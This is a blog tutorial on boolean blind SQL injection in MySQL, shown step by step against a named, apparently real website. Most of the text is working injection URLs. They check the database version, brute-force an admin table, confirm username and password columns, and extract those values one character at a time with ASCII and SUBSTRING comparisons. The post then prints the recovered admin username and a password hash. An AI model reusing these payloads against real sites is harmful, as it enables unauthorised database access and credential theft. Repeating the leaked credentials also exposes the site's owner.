/ / Blind Injection MySQL

Blind Injection MySQL

Edit
In the Name of ALLAH the most Beneficent and the Merciful
Before start First You Should Know Something about MYSQL and its functions
[1] we will b using subselect / sub query here..

A subquery is a SELECT statement within another statement.
Starting with MySQL 4.1, all subquery forms and operations that the SQL standard requires are supported, as well as a few features that are MySQL-specific.
[2] SubString() Function of MYSQL
MySQL SUBSTRING() returns a specified number of characters from a particular position of a given string.
reference http://www.w3resource.com/mysql/string-functions/mysql-substring-function.php#sthash.j773eXq9.dpuf
[3] ASCII Function of MYSQL
MySQL ASCII() returns the ascii value of the left most character of a given string.
Now Get Version
http://www.postrapid.com/index.php?id=5 and substring(@@version,1,1)=5– -
first one in the substring function indicate marker and second 1 works like offset
mean 2nd 1 will restrict the output to 1 character
if page load normally mean version is 5 if contents are missing than version is not 5 :D
now getting table_name
select 1 will return 1 and this whole statement will b true and if it is true mean subselect is working now try bruteforcing table_name
like
http://www.postrapid.com/index.php?id=5 and (select 1 from admin)=1– -
page will load normally if admin table exists otherwise it will throw some error
now e.g we have found the table by bruteforcing..
http://www.postrapid.com/index.php?id=5 and (select 1 from CubeCart_admin_users)=1– -
Error Message:
1242: Subquery returns more than 1 row
we can bypass this by using limit( mean restrincting return of subquery to 1)
http://www.postrapid.com/index.php?id=5 and (select 1 from CubeCart_admin_users limit 0,1)=1– -
now getting its columns
use of ConCat() and Substring() togather
http://www.postrapid.com/index.php?id=5 and (select substring(concat(1,username),1,1) from CubeCart_admin_users limit 1,1)=1– -
concat will return ‘1username’ (actually username from the admin_users table)
and with substring() we will get 1
if page load normally mean username column exixt
now get 2nd column
http://www.postrapid.com/index.php?id=5 and (select substring(concat(1,username,password),1,1) from CubeCart_admin_users limit 1,1)=1– -
page load normally mean password also exists..
now getting data out of these two columns
we will use ascii function here which will return ascii value of whatever we will give to its parameter
http://www.postrapid.com/index.php?id=5 and ASCII(SUBSTRING((select username from CubeCart_admin_users limit 0,1),1,1))>1– -
now substring will return the first character of username from the admin_users table and ascii will convert that to ascii and than we will compare that with our condition where here is >1
mean ascii value is greater than 1
here is the link to ASCII Chart
a=97
and so on
A=65
rest u can see from the table
http://www.postrapid.com/index.php?id=5 and ASCII(SUBSTRING((select username from CubeCart_admin_users limit 0,1),1,1))=112– -
true for 112
now get next value
http://www.postrapid.com/index.php?id=5 and ASCII(SUBSTRING((select username from CubeCart_admin_users limit 0,1),2,1))=111– -
keep going untill u find
http://www.postrapid.com/index.php?id=5 and ASCII(SUBSTRING((select username from CubeCart_admin_users limit 0,1),10,1))>96– – mean null value
username : postrapid
ASCII() empty will return null
now start enumerating password field
http://www.postrapid.com/index.php?id=5 and ASCII(SUBSTRING((select password from CubeCart_admin_users limit 0,1),21,1))>52– -
53
102
102
99
98
56
99
97
54
49
54
54
final password : 9f66bf57850fbae64d515ffcb8ca6166
Love For
Rummy Khan |
Share on Google Plus
Unknown

About Unknown

Hi , This is Osama Mahmood and i will share all my knowledge and skills on #infosec with you and hope you will enjoy learning new and unique things. follow me on twitter @OsamaMahmood007
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment

Subscribe to: Post Comments ( Atom )